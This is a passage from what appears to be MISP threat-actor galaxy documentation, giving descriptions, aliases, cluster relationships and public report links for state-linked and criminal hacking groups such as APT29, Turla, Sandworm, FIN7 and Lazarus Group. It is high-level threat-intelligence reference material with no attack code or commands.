https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf

https://www.reuters.com/article/us-sweden-doping/swedish-sports-body-says-anti-doping-unit-hit-by-hacking-attack-idUSKCN1IG2GN

https://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/

https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/

https://www.washingtonpost.com/technology/2019/02/20/microsoft-says-it-has-found-another-russian-operation-targeting-prominent-think-tanks/?utm_term=.870ff11468ae

https://www.handelsblatt.com/today/politics/election-risks-russia-linked-hackers-target-german-political-foundations/23569188.html?ticket=ST-2696734-GRHgtQukDIEXeSOwksXO-ap1

https://www.accenture.com/t20190213T141124Zw/us-en/_acnmedia/PDF-94/Accenture-SNAKEMACKEREL-Threat-Campaign-Likely-Targeting-NATO-Members-Defense-and-Military-Outlets.pdf

https://marcoramilli.com/2019/12/05/apt28-attacks-evolution/

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/

https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/

https://unit42.paloaltonetworks.com/atoms/fighting-ursa/

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

APT29

A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). '

The tag is: misp-galaxy:threat-actor="APT29"

APT29 is also known as:

  • Group 100

  • COZY BEAR

  • The Dukes

  • Minidionis

  • SeaDuke

  • YTTRIUM

  • IRON HEMLOCK

  • Grizzly Steppe

  • G0016

  • ATK7

  • Cloaked Ursa

  • TA421

  • Blue Kitsune

  • ITG11

  • BlueBravo

  • UAC-0029

APT29 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT29 - G0016" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Midnight Blizzard" with estimative-language:likelihood-probability="likely"

Table 11816. Table References

Links

https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.cfr.org/interactive/cyber-operations/dukes

https://pylos.co/2018/11/18/cozybear-in-from-the-cold/

https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

https://www.secureworks.com/research/threat-profiles/iron-hemlock

https://attack.mitre.org/groups/G0016

https://unit42.paloaltonetworks.com/atoms/cloaked-ursa/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

Turla

A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much - documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took.Kaspersky Lab, however, picked up a number of the attackers searches through their victims emails, which included terms such as Nato and EU energy dialogue Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantecs Gavin O’ Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'

The tag is: misp-galaxy:threat-actor="Turla"

Turla is also known as:

  • Snake

  • VENOMOUS Bear

  • Group 88

  • Waterbug

  • WRAITH

  • Uroburos

  • Pfinet

  • TAG_0530

  • KRYPTON

  • Hippo Team

  • Pacifier APT

  • Popeye

  • SIG23

  • IRON HUNTER

  • MAKERSMARK

  • ATK13

  • G0010

  • ITG12

  • Blue Python

  • SUMMIT

  • UNC4210

  • Secret Blizzard

  • UAC-0144

  • UAC-0024

  • UAC-0003

Turla has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Secret Blizzard" with estimative-language:likelihood-probability="likely"

Table 11817. Table References

Links

https://www.circl.lu/pub/tr-25/

https://securelist.com/introducing-whitebear/81638/

https://securelist.com/the-epic-turla-operation/65545/

https://www.cfr.org/interactive/cyber-operations/turla

https://www.nytimes.com/2010/08/26/technology/26cyber.html

https://securelist.com/blog/research/67962/the-penquin-turla-2/

https://www.kaspersky.com/blog/moonlight-maze-the-lessons/6713/

https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://threatpost.com/linux-modules-connected-to-turla-apt-discovered/109765/

https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/

https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/

https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf

https://yle.fi/uutiset/osasto/news/russian_group_behind_2013_foreign_ministry_hack/8591548

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

https://docs.broadcom.com/doc/waterbug-attack-group

https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec

https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/

https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf

https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html

https://unit42.paloaltonetworks.com/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

https://www.engadget.com/2017/06/07/russian-malware-hidden-britney-spears-instagram/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://www.trendmicro.com/vinfo/vn/security/news/cyber-attacks/cyberespionage-group-turla-deploys-backdoor-ahead-of-g20-summit

https://www.zdnet.com/article/this-hacking-gang-just-updated-the-malware-it-uses-against-uk-targets/

https://attack.mitre.org/groups/G0010/

https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

ENERGETIC BEAR

A Russian group that collects intelligence on the energy industry.

The tag is: misp-galaxy:threat-actor="ENERGETIC BEAR"

ENERGETIC BEAR is also known as:

  • BERSERK BEAR

  • ALLANITE

  • CASTLE

  • DYMALLOY

  • TG-4192

  • Dragonfly

  • Crouching Yeti

  • Group 24

  • Havex

  • Koala Team

  • IRON LIBERTY

  • G0035

  • ATK6

  • ITG15

  • BROMINE

  • Blue Kraken

  • Ghost Blizzard

ENERGETIC BEAR has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Ghost Blizzard" with estimative-language:likelihood-probability="likely"

Table 11818. Table References

Links

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans

https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/

https://www.cfr.org/interactive/cyber-operations/crouching-yeti

https://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA

https://dragos.com/wp-content/uploads/CrashOverride-01.pdf

https://www.independent.ie/irish-news/statesponsored-hackers-targeted-eirgrid-electricity-network-in-devious-attack-36005921.html

https://www.riskiq.com/blog/labs/energetic-bear/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

https://www.kaspersky.com/resource-center/threats/crouching-yeti-energetic-bear-malware-threat

https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672

https://attack.mitre.org/groups/G0035/

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/dymalloy

Sandworm

This threat actor targets industrial control systems, using a tool called Black Energy, associated with electricity and power generation for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and a distributed denial of service prior to the Russian invasion of Georgia. Believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage

The tag is: misp-galaxy:threat-actor="Sandworm"

Sandworm is also known as:

  • Quedagh

  • VOODOO BEAR

  • TEMP.Noble

  • IRON VIKING

  • G0034

  • ELECTRUM

  • TeleBots

  • IRIDIUM

  • Blue Echidna

  • FROZENBARENTS

  • UAC-0113

  • Seashell Blizzard

  • UAC-0082

Sandworm has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="GreyEnergy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="Sandworm" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13" with estimative-language:likelihood-probability="likely"

Table 11819. Table References

Links

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.us-cert.gov/ncas/alerts/TA17-163A

https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid

https://web.archive.org/web/20141016132823/https://www.symantec.com/connect/blogs/sandworm-windows-zero-day-vulnerability-being-actively-exploited-targeted-attacks

https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-outage

https://web.archive.org/web/20141224060545/http://blog.trendmicro.com/trendlabs-security-intelligence/timeline-of-sandworm-attacks/

https://attack.mitre.org/groups/G0034

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://dragos.com/adversaries.html

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks

https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine

https://www.welivesecurity.com/2017/05/23/xdata-ransomware-making-rounds-amid-global-wannacryptor-scare

https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine

https://cert.gov.ua/article/405538

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

FIN7

Groups targeting financial organizations or people with significant financial assets.

The tag is: misp-galaxy:threat-actor="FIN7"

FIN7 is also known as:

  • CARBON SPIDER

  • GOLD NIAGARA

  • Calcium

  • ATK32

  • G0046

  • G0008

  • Coreid

  • Carbanak

  • Sangria Tempest

  • ELBRUS

  • Carbon Spider

FIN7 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN7 - G0046" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Sangria Tempest" with estimative-language:likelihood-probability="likely"

Table 11820. Table References

Links

https://en.wikipedia.org/wiki/Carbanak

https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe

http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf

https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf

https://attack.mitre.org/groups/G0008/

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://blog.morphisec.com/fin7-attacks-restaurant-industry

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

https://blog.morphisec.com/fin7-attack-modifications-revealed

https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://attack.mitre.org/groups/G0046/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://threatintel.blog/OPBlueRaven-Part2/

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

TeamSpy Crew

Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.

The tag is: misp-galaxy:threat-actor="TeamSpy Crew"

TeamSpy Crew is also known as:

  • TeamSpy

  • Team Bear

  • Anger Bear

  • IRON LYRIC

Table 11821. Table References

Links

https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/

https://www.cfr.org/interactive/cyber-operations/team-spy-crew

https://threatpost.com/researchers-uncover-teamspy-attack-campaign-targeting-government-research-targets-032013/77646/

https://www.crysys.hu/publications/files/teamspy.pdf

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20134928/theteamspystory_final_t2.pdf

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

BuhTrap

Buhtrap has been active since 2014, however their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016 Buhtrap managed to conduct 13 successful attacks against Russian banks for a total amount of 1.8 billion rubles ($25.7 mln). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network. As a result, banks have to shut down the whole infrastructure which provokes delay in servicing customers and additional losses. Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central Bank of Russia (further referred to as BCS CBR). We have not identified incidents of attacks involving online money transfer systems, ATM machines or payment gates which are known to be of interest for other criminal groups.

The tag is: misp-galaxy:threat-actor="BuhTrap"

Table 11822. Table References

Links

https://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/

https://www.group-ib.com/brochures/gib-buhtrap-report.pdf

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.forcepoint.com/blog/security-labs/highly-evasive-code-injection-awaits-user-interaction-delivering-malware

https://www.kaspersky.com/blog/financial-trojans-2019/25690/

https://www.welivesecurity.com/2015/04/09/operation-buhtrap/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

WOLF SPIDER

FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.

The tag is: misp-galaxy:threat-actor="WOLF SPIDER"

WOLF SPIDER is also known as:

  • FIN4

  • G0085

Table 11823. Table References

Links

https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf

https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html

https://attack.mitre.org/groups/G0085/

Boulder Bear

First observed activity in December 2013.

The tag is: misp-galaxy:threat-actor="Boulder Bear"

SHARK SPIDER

This group’s activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.

The tag is: misp-galaxy:threat-actor="SHARK SPIDER"

UNION SPIDER

Adversary targeting manufacturing and industrial organizations.

The tag is: misp-galaxy:threat-actor="UNION SPIDER"

Table 11824. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

Silent Chollima

Andariel is a threat actor that primarily targets South Korean corporations and institutions. They are believed to collaborate with or operate as a subsidiary organization of the Lazarus threat group. WHOIS utilizes spear phishing attacks, watering hole attacks, and supply chain attacks for initial access. They have been known to exploit vulnerabilities and use malware such as Infostealer and TigerRAT.

The tag is: misp-galaxy:threat-actor="Silent Chollima"

Silent Chollima is also known as:

  • OperationTroy

  • Guardian of Peace

  • GOP

  • WHOis Team

  • Andariel

  • Subgroup: Andariel

  • Onyx Sleet

  • PLUTONIUM

Table 11825. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/

Lazarus Group

Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.

The tag is: misp-galaxy:threat-actor="Lazarus Group"

Lazarus Group is also known as:

  • Operation DarkSeoul

  • Dark Seoul

  • Hidden Cobra

  • Hastati Group

  • Andariel

  • Unit 121

  • Bureau 121

  • NewRomanic Cyber Army Team

  • Bluenoroff

  • Subgroup: Bluenoroff

  • Group 77

  • Labyrinth Chollima

  • Operation Troy

  • Operation GhostSecret

  • Operation AppleJeus

  • APT38

  • APT 38

  • Stardust Chollima

  • Whois Hacking Team

  • Zinc

  • Appleworm

  • Nickel Academy

  • APT-C-26

  • NICKEL GLADSTONE

  • COVELLITE

  • ATK3

  • G0032

  • ATK117

  • G0082

  • Citrine Sleet

  • DEV-0139

  • DEV-1222

  • Diamond Sleet

  • ZINC

  • Sapphire Sleet

  • COPERNICIUM

  • TA404

  • Lazarus group

Lazarus Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Operation Sharpshooter" with estimative-language:likelihood-probability="likely"

  • linked-to: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="Lazarus group" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Diamond Sleet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Sapphire Sleet" with estimative-language:likelihood-probability="likely"

Table 11826. Table References

Links

https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://www.us-cert.gov/ncas/alerts/TA17-318A

https://www.us-cert.gov/ncas/alerts/TA17-318B

https://securelist.com/operation-applejeus/87553/

https://securelist.com/lazarus-under-the-hood/77908/

https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity

https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

https://www.cfr.org/interactive/cyber-operations/lazarus-group

https://www.cfr.org/interactive/cyber-operations/operation-ghostsecret

https://www.cfr.org/interactive/cyber-operations/compromise-cryptocurrency-exchanges-south-korea

https://www.bleepingcomputer.com/news/security/lazarus-group-deploys-its-first-mac-malware-in-cryptocurrency-exchange-hack/

https://content.fireeye.com/apt/rpt-apt38

https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/

https://www.theguardian.com/world/2009/jul/08/south-korea-cyber-attack

https://web.archive.org/web/20131123012339/https://www.symantec.com/connect/blogs/trojankoredos-comes-unwelcomed-surprise

https://www.nytimes.com/2013/03/21/world/asia/south-korea-computer-network-crashes.html

https://web.archive.org/web/20130607233212/https://www.symantec.com/connect/blogs/south-korean-financial-companies-targeted-castov

https://web.archive.org/web/20130701021735/https://www.symantec.com/connect/blogs/four-years-darkseoul-cyberattacks-against-south-korea-continue-anniversary-korean-war

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/the-hack-of-sony-pictures-what-you-need-to-know

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

https://www.us-cert.gov/ncas/analysis-reports/AR19-129A

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/

https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/

https://www.theregister.co.uk/2019/04/10/lazarus_group_malware/

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-into-the-lazarus-groups-operations

https://www.kaspersky.com/about/press-releases/2017_chasing-lazarus-a-hunt-for-the-infamous-hackers-to-prevent-large-bank-robberies

https://medium.com/threat-intel/lazarus-attacks-wannacry-5fdeddee476c

https://attack.mitre.org/groups/G0032/

https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.bankinfosecurity.com/vietnamese-bank-blocks-1-million-online-heist-a-9105

https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD

https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware

https://blog.trendmicro.com/trendlabs-security-intelligence/what-we-can-learn-from-the-bangladesh-central-bank-cyber-heist/

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html

https://www.bloomberg.com/news/articles/2018-05-29/mexico-foiled-a-110-million-bank-heist-then-kept-it-a-secret

https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/

https://www.darkreading.com/attacks-breaches/north-korean-hacking-group-steals-$135-million-from-indian-bank-/d/d-id/1332678

https://www.zdnet.com/article/north-korean-hackers-infiltrate-chiles-atm-network-after-skype-job-interview/

https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html

https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/covellite

https://www.hvs-consulting.de/lazarus-report/

https://github.com/hvs-consulting/ioc_signatures/tree/main/Lazarus_APT37

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_tools.html

https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html

https://attack.mitre.org/groups/G0082

https://attack.mitre.org/groups/G0032

